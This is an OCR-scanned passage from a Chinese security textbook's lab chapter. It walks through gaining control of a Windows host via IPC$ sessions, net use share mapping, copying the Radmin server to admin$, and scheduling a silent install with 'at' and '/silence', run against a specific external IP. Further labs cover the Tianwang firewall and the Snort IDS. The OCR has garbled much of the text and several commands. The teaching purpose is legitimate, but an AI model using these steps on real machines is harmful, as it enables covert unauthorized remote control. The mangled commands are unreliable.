在 这 个 部 分 里 面 要 注意 空格 ,use 后 面 有 个 空格 ,IPC$ 后 面 有 个 空格 ,"" 后 面 也 有 一 个 
空格 ,user: 后 面 没有 空格 ,注意 冒号 。 这 里 与 192. 168. 0. 1 连接 (如 图 15-45 所 示 )。 


后 
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Microsoft Windows XP [有 本 5.1.2688] 
kc》 版权 所 有 1985-28@1 Microsoft corp- 


:pocunents and Settings\zhutqmnet use \\192.168.8.1\IPCS ™ /user:™™ 
命令 成 功 完成 。 


lc: Docunents and Settings\zhutq> 


图 15-45 ”建立 空 连接 
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建立 了 空 连接 后 ,输入 net time \\IP 查看 对 方 时 间 , 输 入 dir \\IP\d $ 查看 对 方 d 盘 的 


目录 ,结果 如 图 15-46 所 示 。 


lc: \Docunents and Settings\Adninistratormet tine \\211.85.193.141 
N211.85.193.141 的 当前 时 间 是 28e5/5/38 下 午 83:34 


cunents and SettingsNidninistratorydir \\211.85.193.141\d$ 


出 
HE 
CG: \pocunents and Sottings\Adninistrator> 


图 15-46 查看 时 间 和 目录 


上 面 的 结果 表示 可 以 成 功 查 看 对 方 时 间 , 但 无 法 查看 对 方 d 盘 目 录 。 这 说 明 空 连接 的 
首先 


车 接 ,也 就 是 包括 用 户 名 和 密码 的 连接 。 
码 一 般 为 


权限 不 够 。 所 以 下 一 步 应 该 建立 
知道 对 方 的 用 户 名 和 密码 才能 够 进行 这 一 步 。 实 验 室 的 计算 机 密 
连接 提供 了 方便 

先 删除 刚才 建立 的 空 连接 ,命令 : 


net use \\IPNIPCS$ /delete 


如 果 这 里 不 先 删除 刚才 建立 的 非 空 连接 ,那么 就 会 产生 错误 ,提示 凭据 集 冲 突 。 


建立 非 空 连接 ,命令 : 

net use \N\IPNIPC$ "password" /user:"administrator" 

这 里 的 password 要 填写 实际 的 密码 。 如 果 没 有 密码 , 则 直接 写 双 引号 。 
建立 成 功 , 则 会 出 现 如 图 15-47 所 示 的 提示 。 


Microsoft Windows 2868 [Version 5.69.2195] 
KC》 版 权 所 有 1985-288@ Microsoft Corp- 


IC: \Docunents and Settings\Adninistratormnet use \\211.85.193.141\IPC$ “yuchen" /| 


"adninistrator" 
完成 。 


IC: bocunents and Settings\hdninistrator>m 
图 15-47 提示 
然后 输入 命令 : 
dir \\IP\d$ 
就 可 以 清楚 地 看 到 对 方 d 盘 中 的 文件 目录 了 .如 图 15-48 所 示 。 


如 果 非 空 连接 
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jc: \Docunents and Settings\Adnin 2 N211.85.193.141\d$ 


动 器 \\211.85.193.141M$ 中 
卷 的 序列 号 是 855C-16D1 


2 的 目录 


83:58 <DIR> 5.2.3-3 教 师 教学 准备 情况 登记 表 汇 总 


:84 AdnD11.a11 
:46 <DIR> Adobe 
:34 <DIR> BitConet 
<DIR> Divy 
<DIR> dounload 
<DIR> Macronedia 
<DIR> Microsoft Office 
<DIR> 
<DIR> 
<DIR> 
274,.432 
<DIR> 
<DIR> 
<DIR> 
364.544 字 节 
285.112.832 可 用 


IC: \Docunents and Settings\hdninistrator)。 
图 15-48 查看 d 盘 的 文件 目录 


然后 继 名 


全 公 
节令 : 


net use z: \\IP\d$ 


执行 命令 成 功 , 如 图 15-49 所 示 


ic: \Docunents and Settings dministratorynet use 2: \\211.85.193.141\d$ 


命令 成 功 


IC:\Docunents and Settings\Adninistrator>, 


图 15-49 把 对 方 d 盘 映 射 成 自己 的 z 盘 


回 到 “我 的 电脑 ”目录 下 ,观察 是 否 出 现 新 盘 符 ,可 以 尝试 把 对 方 的 文件 复制 到 自己 计算 


机 上 ,如 图 15-50 所 示 


的 电脑 
“E) ”编辑 (E) ”查看 (V) 收 诚 (&) 工具 (TD 帮助 (H) 
路- 回 | 发 扫 索 马 文 人 天 丧 | 申 在 X 王 | 国 - 


验 ,映射 默认 共享 ,也 就 是 把 对 方 的 d 盘 映 射 成 自己 的 z 盘 


名 阳 翅 0 后 可 必 竺 到 锋 扩 ”本 上 网 助手 ”加 暂停 拉 埠 < 清理 
一 = - 

Er 当 时 里 里 名 与 罚 马 旦 

旦 3.5 软盘 (A:) 本 地 磁盘 (C:) 本 地 磁盘 (D:) 本 地 磁盘 (E:) ”光盘 (F:) ”本 地 磁盘 (6:) ”控制 面板 。 可 移动 磁盘 (位 于 * 

;的 电脑 (H:) 211.85.193.1 

上 41" 上 )(2:) 

已 项 目 可 以 查看 其 说 明 。 

六 您 计算 机 上 的 文件 和 文件 来 


图 15-50 复制 文件 


当 这 几 步 成 功 后 ,就 可 以 把 Radmin 的 服务 器 端 远 程 复制 到 被 控 机 器 中 了 。 


3. 复制 服务 器 端 


下 ,admin$ 所 对 应 的 就 是 c 盘 下 的 winnt 目录 ,如 图 15-51 所 示 。 


把 远程 控制 软件 服务 器 端 r_server. exe 和 AdmDll. dll 复制 到 对 方 admin $ 共享 
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命令 


心 


copy r_server. exe \\IP\admin $ 
copy Rdmd11.dl1 \\IPNadminS$ 


注意 在 复制 的 时 候 , 两 个 文件 都 必须 在 当前 目录 下 。 


‘Docunents and Settings\hdninistratorycopy r_server.exe \\211.85.193.141\adnin| 


Ic: 
日 

已 复制 1 个 文件 。 
le: 

已 


Documents and Settings\hdninistrator7>copy adndl1l.dll 211.85.193.141tvadming 
让 文件 


复制 


C:\Documents and Settings\Adninistrator> 


图 15-51 复制 服务 器 端 


4. 安装 和 运行 服务 器 端 

服务 器 端 可 以 在 复制 后 直接 运行 。 

首先 查看 对 方 计算 机 时 间 ,然后 设 定 服务 器 端 在 对 方 计算 机 运行 的 时 间 ,注意 要 比 当 前 
看 到 的 时 间 晚 一 点 ,使 服务 器 端 在 设 定 的 时 间 自 动 运行 。 

命令 : 

at \\IP 7:00 r_server. exe 

等 到 这 个 时 间 到 了 以 后 ,就 在 本 地 机 器 上 运行 客户 端 ,使 用 对 方 IP 进行 连接 (如 
图 15-52 所 示 )。 


a6 
连接 选项 (C) 连接 模式 (M) 视图 选项 (V) 工具 选项 (TD) 帮助 说 明 (H) 

多 | 区 了 师 | 国 国 加 多 加 山 辐 | 男 书 | 忆 
1 国 


211.85.195.1 
和 ; 


图 15-52 用 客户 端 控制 对 方 主机 


完成 以 上 步骤 之 后 ,可 以 完成 远程 控制 的 部 分 功能 ,例如 磁盘 访问 、 重 新 启动 对 方 系统 ， 
但 还 无 法 完成 “完全 控制 ”的 功能 。 只 有 将 服务 器 端 安 装 在 对 方 主机 之 后 才能 够 使 用 “完全 
控制 ”的 功能 。 

服务 器 端 安装 过 程 如 下 : 

首先 通过 at 命令 打开 对 方 计算 机 的 telnet 服务 。 
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命令 : 

at \\IP 12:00 cmd /c "net start telnet” 

等 服务 启动 后 ,登录 对 方 telnet 服务 。 

命令 : 

telnet \\ip 

然后 进入 到 对 方 的 winnt 目录 下 。 通 过 命令 行 安装 radmin。 
命令 : 

services. exe /install /silence 


后 面 的 silence 参数 是 为 了 在 对 方 机 器 上 不 显示 任何 消息 。 
安装 完毕 后 就 可 以 用 客户 端 连接 了 。 


5. 远程 控制 


Radmin 的 使 用 比较 简单 ,打开 客户 端 后 单 击 * 连 接 选项 ,然后 填 人 对 方 IP 就 可 以 了 。 
在 主 界面 上 会 显示 对 方 的 计算 机 图 标 , 单 击 右键 就 可 以 选择 控制 方式 。 
可 以 尝试 使 用 一 下 "完全 控制 ”。 


6. 外 载 .清除 服务 器 端 


要 想 知道 自己 计算 机 里 面 是 否 安装 了 radmin, 可 以 打开 任务 管理 器 ,观察 进程 (如 
图 15-53 所 示 )。 其 中 会 有 一 个 r_server. exe 进程 运行 ,而 且 默 认 每 次 开机 后 自动 运行 。 


旦 windows 任务 管理 器 -olxl 


00:38 
00:00 
:00:01 
00:00 
00:00 
:00:00 
00:06 
00:00 
00:00 
:00:00 
00:00 
:00:28 
01:01 
00:02 
00:00 
00:00 
00:04 
NNN 


15-53 ”观察 进程 运行 情况 


可 以 单 击 “ 开 始 ” 一 “设置 "一 “控制 面板 ”一 “管理 工具 ”一 “服务 ”找到 Remote 
administrator server 按 右 键 选 择 “ 停 止 ”"。 这 样 就 可 以 停止 +_server. exe 进程 。 并 且 把 服务 
设 为 “禁用 ”, 下 次 开机 也 不 会 运行 了 。 


另外 ,Radmin 也 可 以 方便 地 外 载 。 和 安装 一 样 ,进入 r_server. exe 所 在 文件 来。 输入 
命令 : r_server. exe /uninstall 即 可 种 载 。 


1563 思考 题 


1. 观察 r_server. exe 运行 时 ,被 控制 计算 机 上 是 否 能 找到 相关 的 运行 图 标 ? 
2. 如 何 关闭 IPC $ 共享 ? 


157 天 网 防火 墙 基本 配置 
157.1 实验 目的 、 环 境 及 背景 知识 


1. 实验 目的 


通过 实验 了 解 各 种 不 同类 型 防火 墙 的 特点 ,掌握 个 人 防火 墙 的 工作 原理 和 规则 设置 方 
法 ,掌握 根据 业务 需求 制定 防火 墙 策略 的 方法 。 根 据 不 同 的 业务 需求 制定 天 网 防火 墙 策略 ， 
并 制定 测试 相应 的 防火 墙 的 规则 等 。 


2. 实验 环境 


硬件 : 主流 配置 的 计算 机 , 连 入 Internet。 
软件 : 安装 Windows 2000/2003/XP 操作 系统 ,天 网 防火 墙 个 人 版 3.0 版 。 


3. 背景 知识 


防火 墙 是 网 络 安全 的 第 一 道 防线 , 按 防 火 墙 的 应 用 部 署 位 置 分 类 ,可 以 分 为 边界 防火 
墙 \ 个 人 防火 墙 和 分 布 式 防火 墙 三 类 。 

天 网 防火 墙 个 人 版 由 广州 众 达 天 网 技术 有 限 公 司 研发 制作 给 个 人 计算 机 使 用 的 网 络 安 
全 程序 工具 。 是 目前 最 流行 的 个 人 防火 墙 工具 ,其 官方 网 站 为 http://www. sky. net, cn/。 
自 1999 年 推出 天 网 防火 墙 个 人 版 v1. 0 后 ,陆续 推出 了 v1. 01、v2. 0…v2. 5. 0、.v2. 7.7… 等 
更 新 版 本 ,本 实验 中 使 用 的 为 v3. 0。 


1572 实验 步骤 


按照 安装 提示 完成 安装 ,并 重启 系统 ,完成 注册 过 程 ,得 到 试用 版 本 。 
1. 基本 设置 


图 15-54 是 防火 墙 的 主 界面 ,将 鼠标 移动 到 各 个 图 标 上 ,可 以 看 到 图 标的 作用 。 单 击 第 
三 个 图 标 , 可 以 进行 基本 设置 。 


2. 应 用 程序 权限 设置 
单 击 “ 应 用 程序 规则 ?按钮 ,显示 * 应 用 程序 访问 网 络 权 限 设置 "窗口 (如 图 15-55 所 示 )。 
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在 这 里 可 以 选择 应 用 程序 是 否 可 以 访问 网 络 。 这 样 可 以 避免 一 些 恶 意 程序 访问 网 络 ， 
在 管理 员 没 有 发 现 它 的 时 候 , 防 火 墙 默认 是 不 允许 访问 网 络 的 。 


国 训 避 忆 各 会 ? 


图 15-55 ”应 用 程序 访问 网 络 权 限 设置 


进一步 可 以 进行 应 用 程序 高 级 设置 ,选择 某 一 个 应 
用 程序 ,然后 单 击 “ 选 项 ”, 可 以 在 新 窗口 中 进行 高 级 设置 
(如 图 15-56 所 示 )。 


SS 
下 
局 a 
s 
下 ” 


3. 安全 级 别 设置 


天 网 个 人 版 防火 墙 的 安全 级 别 分 为 低 .中 、 高 三 个 等 

级 ,默认 的 安全 等 级 为 中 级 。 为 了 了 解 规则 的 设置 等 情 

况 , 我 们 选择 自 定义 安全 级 别 。 单 击 第 二 个 按钮 打开 自 

定义 的 IP 规则 窗口 (如 图 15-57 所 示 ) 。 图 15-56 应 用 程序 规则 高 级 设置 
在 自 定义 JP 规则 的 工具 条 上 ,可 以 使 用 工具 按钮 完 

成 规则 的 增加 修改、 删除 .保存 调整 .导入 导出 操作 。 需 要 注意 的 是 ,规则 增加 修改、 删除 

等 操作 后 一 定 要 单 击 保存 图 标 进行 保存 ,否则 无 效 。 


4. 修改 规则 


双击 需 修改 的 规则 ,或 者 单 击 工具 条 上 的 修改 按钮 可 以 打开 该 规则 的 修改 窗 体 (如 
图 15-58 所 示 )。 然 后 按照 需求 对 各 部 分 进行 修改 。 


me 


DOUCCOOOOLOU 


| 


图 15-57 自 定义 IP 规则 图 15-58 修改 IP 规则 


(1) 首先 输入 规则 的 “名 称 ” 和 * 说 明 ”, 以 便于 查找 和 阅读 。 

(2) 选择 该 规则 是 对 进入 的 数据 包 还 是 输出 的 数据 包 有 效 。 

(3) “对方 IP 地 址 ”, 用 于 确定 选择 数据 包 从 哪里 来 或 是 去 哪里 ,这 里 有 几 点 说 明 :“ 任 
何 地 址 ”是 指数 据 包 从 任何 地 方 来 “局 域 网 网 络 地 址 ”是 指数 据 包 来 自 和 发 向 局 域 网 “指定 
地 址 ”是 可 以 自己 输入 一 个 地 址 ,“ 指 定 的 网 络 地 址 ”是 自己 输入 一 个 网 络 和 掩 码 。 

(4) 除了 录入 选择 上 面 内 容 , 还 要 录入 该 规则 所 对 应 的 协议 ,其 中 ,IP 协议 不 用 填写 内 
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容 ,注意 ,如 果 录 入 IP 协议 的 规则 ,要 保证 IP 协议 规则 的 最 后 一 条 的 内 容 是 :“ 对 方 地 址 ; 
任何 地 ,动作 : 继续 下 一 规则 ”。 

TCP 协议 要 填 和 人 本 机 的 端口 范围 和 对 方 的 端口 范围 ,如 果 只 是 指定 一 个 端口 ,那么 在 
起 始 端口 处 录入 该 端口 ,结束 处 ,录入 同样 的 端口 。 如 果 不 想 指定 任何 端口 ,只 要 在 起 始 端 
口 都 录入 0。TCP 标志 比较 复杂 ,可 以 查阅 其 他 资料 ,如 果 不 选 择 任何 标志 ,那么 将 不 会 对 
标志 做 检查 。 

ICMP 规则 要 填 人 类 型 和 代码 。 如 果 输 入 255, 表 示 任 何 类 型 和 代码 都 符合 本 规则 。 

ICMP 不 用 填写 内 容 。 

(5) 当 一 个 数据 包 满 足 上 面 的 条 件 时 ,防火 墙 会 对 该 数据 包 采 取 动作 。 

通行 是 指 让 该 数据 包 畅通 无 阻 的 进入 或 者 出 去 。 拦 截 是 指 让 该 数据 包 无 法 进入 机 器 。 
继续 下 一 规则 是 指 不 对 该 数据 包 做 任何 处 理 , 由 该 规则 的 下 一 条 同 协议 规则 来 决定 对 该 包 
处 理 。 

在 执行 这 些 规则 的 同时 ,还 可 以 定义 是 否 记 录 这 次 规则 的 处 理 和 这 次 规则 的 处 理 的 数 
据 包 的 主要 内 容 , 并 用 右 下 角 的 “天 网 防火 墙 个 人 版 "图标 是 否 闪 烁 或 发 出 声音 提示 。 

(6) 新 增 规则 

单 击 工 具 条 的 新 增 规则 按钮 可 以 新 增 一 条 规则 ,并 弹出 该 规则 的 编辑 界面 。 设 置 完成 
后 单 击 “ 确 定 ”, 并 单 击 工具 条 的 保存 按钮 。 


5. 网 络 访问 监控 功能 


单 击 查看 按钮 可 以 打开 网 络 访问 的 监控 功能 ,显示 目前 计算 机 中 有 哪些 进程 对 网 络 进 
行 访问 ,哪些 端口 被 打开 (如 图 15-59 所 示 )。 


”天 网 防火 哮 丰 大 版 


应 用 程序 网 络 状 态 。 |rct 协 议 7| X 已 i 
RY srsren 

# RY Generie Host Process for Win32 Services 

出 加 Mpplication Layer Gateway Service 

# 了 风 Kaspersky Anti-Virus 

BY Generic Host Process for Win32 Services 


图 15-59 应 用 程序 的 网 络 状态 


6. 日 志 查看 


在 防火 墙 日 志 选 项 中 可 以 查看 当前 的 日 志 , 也 可 以 查看 历史 日 志 ( 如 图 15-60 所 示 ) 。 
选中 每 次 退出 防火 墙 时 自动 保存 日 志 , 当 退出 防火 墙 的 保护 时 ,天 网 防火 墙 将 会 把 当日 
的 日 志 记 录 自 动 保存 到 /SkyNet/FireWall/log 文件 夹 下 ,打开 文件 夹 便 可 查看 当日 的 日 志 


[os:18:57] 192， 168.1. 23 汪 轩 接 本 机 ethi 0s-SSN[139] 端 口 ， 
下 

[os:19:00] 192. 68 1-23 斌 加 轩 按 本 机 的 NetBios-SSN[139] 端 口 ， 
es ， 

[09:19:06] 192， 168 123 试图 连接 本 机 的 NetBi os-SSN[139] 端 口 ， 
二 


[09:31:23] 192， 468.1. 23 斌 区 笑 接 本 机 的 Nothi 0s-SSN[139] 端 口 ， 


[09:31:28] 192, 89:1. 23 斌 加 蜂拥 本 机 etBi os5-SSN[139] 端 口 ， 
3 敢 疯 


[09:31:32] 192， 1 .123 生 加 本 接 本 机 和 WetBi os-SSN[139] 端 口 ， 
二 再 


7. 实践 


根据 以 上 功能 ,两 人 一 组 ,分 别 完成 如 下 不 同 需求 的 防火 墙 规则 设置 并 进行 测试 。 

需求 1: ICMP 规则 允许 Ping 进来 ,其 他 禁止 ,TCP 规则 允许 访问 本 WWW 服务 和 主 
动 模式 的 FTP 服务 ,其 他 禁止 ,UDP 禁止 。 设 计 实验 验证 结果 。 

需求 2: ICMP 规则 允许 Ping 出 去 ,其 他 禁止 ; TCP 规则 禁止 所 有 连接 ,允许 IE 访问 
Internet 的 80 端口 ,UDP 规则 允许 DNS 解析 ,其 他 进出 UDP 报 文 禁止 。 设 定好 规则 后 设 
计 实 验 来 测试 结果 。 


15.73 思考 题 


1. 根据 你 所 了 解 的 网 络 安全 事件 ,你 认为 天 网 防火 墙 不 具备 的 功能 有 哪些 ? 
2. 如 果 安 装 了 个 人 防火 墙 ,是 否 能 防范 上 一 节 提 到 的 远程 控制 软件 ? 


158 入 侵 检 测 系统 Snort 的 使 用 
15.8.1 实验 目的 、 环 境 及 背景 知识 


1. 实验 目的 


通过 实验 更 加 透彻 的 了 解 人 侵 检测 系统 的 概念 .体系 结构 和 检测 技术 。 学 会 使 用 开源 
入 侵 检 测 软件 Snort 。 


306 


信息 安全 原理 及 应 


2. 实验 环境 


硬件 : 主流 配置 计算 机 , 连 人 局 域 网 。 
软件 : 安装 Windows 2000/2003/XP 操作 系统 ,WinPcap .Snort for Windows 2. 8. 1 及 
相关 规则 库 。 


3. 背景 知识 


Snort 是 一 个 多 平台 的 强大 的 网 络 人 侵 检测 系统 。 它 可 以 完成 数据 包 嗅 探 ,数据 包 记 
录 、 人 侵 检测 实时 发 送 报警 信息 的 功能 。 能 运行 在 不 同 的 操作 系统 上 ,目前 ,Snort 是 最 流 
行 的 免费 NIDS, 其 官方 网 站 为 http://www. snort. org。 在 官方 网 站 上 可 以 下 载 到 Snort 
的 Windows 版 本 和 Linux 版 本 的 安装 文件 和 最 新 规则 库 。 

Snort 由 以 下 几 个 部 分 组 成 : 数据 包 嗅 探 器 、 预 处 理 器 、 检 测 引擎 .报警 输出 模块 。 其 中 
预 处 理 器 和 报警 输出 模块 为 插件 ,在 Snort 下 载 的 版 本 中 不 包含 ,需要 自行 安装 。 本 实验 中 
不 涉及 到 插件 部 分 。Snort 的 安装 包 可 在 www. snort. org 下 载 。 


15.82 实验 步骤 


本 实验 采用 的 实验 平台 为 Windows, 相 对 于 Linux, Windows 平台 的 安装 更 加 容易 些 ， 
配置 也 相应 简单 。 


1. 安装 WinPcap 和 Snort 


Windows 操作 系统 下 的 Snort 需要 使 用 WinPcap 从 网 卡 捕获 数据 包 , 因 此 需要 先 安 装 
WinPcap。 在 而 后 安装 Snort 时 ,会 遇 到 确认 已 经 在 机 器 上 安装 了 WinPcap 的 提示 。 


2. 测试 


安装 结束 之 后 ,要 先 测试 一 下 是 否 安装 成 功 。 需 要 注意 的 是 ,Snort 的 使 用 是 命令 行 模 
式 ,如果 运 行 窗 口 不 在 Snort. exe 的 当前 目录 下 时 ,需要 设置 环境 变量 ,让 它 指向 Snort。 
测试 是 否 安 装 成 功 ,可 以 在 命令 行 模式 下 输入 : Snort。 
回 车 后 如 果 看 到 如 图 15-61 所 示 的 显示 就 表示 安装 成 功 。 
:\Snort \hinyenort 


-> Snortt Cm 
Vorsion 2.8.1-ODBG HydQL PloxAESP-YIN32 <Build 28> 


By Martin Rooach B The Snort Tean: http://wwe.smort.org/toan.html 
CC> Copyright 1998-2BB8 Sourcefire Inc-- 
Using PCRE version: 7.4 2887-89-21 


图 15-61 测试 运行 


Snort 的 命令 行 的 通用 形式 为 : 


snort — [options] 
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3. 嗅 探 器 模式 运行 


Snort 的 使 用 有 多 种 模式 ,最 基本 的 模式 是 嗅 探 器 模式 ,在 命令 行 中 输入 : 

Snort -v: 可 以 显示 TCP/IP 等 的 网 络 数据 包头 信息 在 屏幕 上 。 

Snort -vd: 可 以 显示 较 详 细 的 包括 应 用 层 的 数据 传输 信 

Snort -vde: 可 以 显示 更 详细 的 包括 数据 链 路 层 的 数据 

这 里 输入 居于 .Snort 开始 工作 ,在 屏幕 上 可 以 看 到 抓 取 的 大 量 数据 包 。 
按 Ctrl 十 V 键 停止 ,并 可 显示 检测 的 统计 结果 (如 图 15-62 所 示 ) 。 


WINDOWS\system32\cmd.exe 


Options 


t \hin> 


图 15-62 Snort -v 运行 结束 后 的 结果 


4. 分 组 日 志 模 式 


上 面 介 绍 的 嗅 探 器 模式 的 几 个 命令 都 只 把 信息 显示 在 屏幕 上 ,而 如 果 要 把 这 些 数据 信 
息 记 录 到 硬盘 上 并 指定 到 一 个 目录 中 , 那 就 需要 使 用 日 志 模 式 
Snort 使 用 -1 参数 ,就 能 告诉 它 将 包 记录 到 选 定 的 目录 中 。 


从- 人 
节令 : 


snort ~v -1./log 


说 明 : 把 Snort 获取 的 报头 信息 存 人 当前 文件 夹 的 log 目录 中 ,用 户 可 以 根据 自己 的 需 
要 的 位 置 而 更 换 。 
命令 : 


snort 一 vde -1 ./log -hl192.168.1.0/24 


说 明 : 记录 192. 168. 1. 0/24 这 个 C 类 网 络 的 所 有 进 站 数据 包 信息 到 log 目录 中 去 ,其 
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log 目录 中 的 目录 名 按 计算 机 的 IP 地 址 为 名 以 相互 区 别 . 


全 人 人 
命令 : 


snort -1./log -b 


说 明 : 记录 Snort 抓 到 的 数据 包 并 以 TCPDUMP 二 进 制 的 格式 存放 到 log 目录 中 去 ， 


而 Snort 一 般 默认 的 日 志 形 式 是 ASCII 文本 格式 。ASCII 文本 格式 便于 阅读 ,二 进 制 的 格 


式 转 


化 为 ASCII 文本 格式 无 疑 会 加 重工 作 量 ,所 以 在 高 速 的 网 络 中 ,由 于 数据 流量 太 大 ,应 


该 采用 二 进 制 的 格式 。 


5. 网 络 入 侵 检 测 模式 (NIDS) 


网 络 人 侵 检测 模式 是 用 户 最 常用 到 的 模式 。 这 种 模式 混合 了 嗅 探 器 模式 和 分 组 日 志 模 


式 , 并 且 需 要 载 人 规则 库 才 能 工作 


首先 配置 Snort. conf 文件 。 打 开 C:\Snort\etc\snort. conf 文件 ,找到 这 样 几 行 , 编 辑 


如 下 : 


Snort 后 是 空 


var RULE_PATH c:Nsnort\rules  // 给 出 rules 的 位 置 
var HOME_NET any /any 改 成 本 机 器 IP 192.168.1.16/24 
var HTTP_PORTS 80 /根据 自身 设置 修改 


然后 找到 rule 数据 包 ,解压 后 复制 到 c:\snort\rules 文件 夹 中 ,这 个 文件 夹 在 刚 安 
的 ,需要 专门 下 载 rule 数据 包 


输入 : 
snort 一 c "c:\snort\etc\snort.conf" —1"c:\snort\log" -d -e 一 X 


即 可 根据 配置 运行 Snort 入 侵 检 测 系统 (如 图 15-63 所 示 ) 。 


snort -conf \snort\log -d -e —% 
IRunning in IDS mode 


Initializing Snort ==— 
g Output Plugins? 


PortUar ’HITP_PORTS’ defined : [ 89 ] 
PortUar ’SHELLCODE_PORTS’ defined : [ 9:79 81:65535 ] 
PortUar *ORACLE_PORTS’ defined : [ 1521 ] 
Prag3 global config: 
Max frags: 65536 
Fragment menory cap: 4194384 bytes 
Prag3 engine config: 
Target-based policy: FIRST 
Fragnent tineout: 69 seconds 
Fragnent min_ttl: 1 
Fragnent ttl linit Cnot used): 5 
Fragnent Problems: 1 
Istreanm5s global con 
Track ICP 
Max TCP 
Mencap (for reassenbly packet storage): 8388688 
Be 


图 15-63 Snort 的 IDS 模式 
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载 人 Snort. conf 配置 文件 后 Snort 将 会 应 用 设置 在 Snort. conf 中 的 规则 去 判断 每 一 个 
数据 包 及 其 性 质 。 

6. 插件 

实际 上 ,采用 命令 行 形式 使 用 Snort 虽然 占用 资源 少 ,运行 快 ,但 是 需要 记忆 大 量 命令 ， 
所 以 目前 有 第 三 方 组 织 或 者 个 人 为 Snort 编写 了 各 种 图 形 类 插件 ,能 够 更 加 方便 地 运行 和 
获取 结果 。 


1583 思考 题 


1. 如 果 将 Snort 安装 在 交换 环境 中 , 它 如 何 获取 网 络 数据 包 ? 
2. 请 在 Internet 上 查找 有 关 Snort 的 捅 件 , 并 叙述 Snort 常用 的 插件 有 哪些 ,分 别 有 何 


作用 。 
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9787302099840 
9787302108269 
9787302108634 
9787302112518 
9787302149699 
9787302155409 
9787302160151 
9787302106319 
9787302126492 
9787302146032 
9787302146032 
9787302124375 
9787302103653 
9787302150343 
9787302136767 
9787302150503 
9787302148845 
9787302071310 
9787302109013 
9787302140689 
9787302145257 
9787302128250 
9787302084471 
9787302128793 
9787302112358 
9787302154211 


书 名 
软件 体系 结构 设计 
数据 结构 一 一 Java 语言 描述 
数据 结构 (C 语言 描述 ) 


数据 结构 (C 语言 描述 ) 学 习 指导 与 习题 解答 


数据 结构 (面向 对 象 语言 描述 ) 
数据 结构 教程 

数据 结构 教程 上 机 实验 指导 
数据 结构 教程 学 习 指导 

数据 库 系 统 与 应 用 (SQL Server) 
数据 库 管 理 与 编程 技术 

数据 库 技术 一 一 设计 与 应 用 实例 
数据 库 系 统 教程 
数据 挖掘 原理 与 算法 
数字 图 像 处 理 与 分 析 
数字 图 像 处 理 

数字 图 像 处 理 

算法 设计 与 分 析 
算法 与 数据 结构 
UNIX 系统 应 用 编程 

网 络 编程 技术 及 应 用 

网 络 存储 导论 

网 络 设备 配置 与 管理 

微 处 理 器 (CPU) 的 结构 与 性 能 
微机 原理 .汇编 与 接口 技术 
微机 原理 ,汇编 与 接口 技术 学 习 指导 
微机 原理 .汇编 与 接口 技术 实验 教程 
微机 原理 与 接口 技术 
信息 安全 数学 基础 
信息 对 抗 与 网 络 安全 

组 合理 论 及 其 应 用 

离散 数学 


者 


